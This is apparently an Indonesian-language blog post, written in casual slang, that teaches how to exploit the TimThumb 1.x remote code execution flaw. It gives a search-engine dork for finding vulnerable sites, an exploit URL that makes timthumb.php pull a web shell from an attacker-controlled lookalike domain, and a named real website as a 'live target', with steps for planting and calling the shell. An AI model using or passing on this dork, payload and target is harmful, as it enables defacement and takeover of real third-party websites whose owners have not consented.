Assalamualaikum

 Helo welkam tude jungle ok kali ini saya akan membagikan exploit Timthumb 1.x rce , sebenarnya ini udah lama ya cuman pengen aja weh gw publish di sini itung-itung nambah post 😂 

Siapin bahan-bahannya dulu gansq
  1. Kopi + roko <= kalo gapunya nganjuk sadjah
  2. Hp / leptot lo idupin internet nya
  3. Dork = "inurl:/timthumb.php" mau yang lebih banyak ? Cek Di sini aqang
  4. Exploitnya = "timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php"
  5. Live target = http://eurovie.vn/timthumb.php
  6. Auto Exploiter Timthumb 1.x RCE
Oke syiap sekarang kita mulai beraksi
  1. Lo dorking menggunakan dork di atas di mesin pencari google , bing.com juga bisa , sebagai contoh dulu w pake live target di atas
  2. Buka http://eurovie.vn/timthumb.php dan penampakannya seperti ini
  3. Sekarang lo tambahin exploitnya di belakang urlnya http://eurovie.vn/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php Dan jika muncul seperti di gambar berarti sukses di exploitasi
  4. Untuk memanggil shellnya lo tinggal ikutin aja petunjuk yang ada di gambar 😘😘😘
  5. Untuk metode kali ini cukup sampai di sini ea kawand dadah
Untuk sumber tutorial w liat
https://dottutorial.blogspot.com/2018/06/deface-timthumb-exploit-1x-rce.html?m=1
Untuk sumber dorknya
http://dukadaku.blogspot.com/2014/10/bug-dork-timthumb-new.html?m=1
Oke cukup sekian

 wassalamu'alaikum.wr.wb

0 Komentar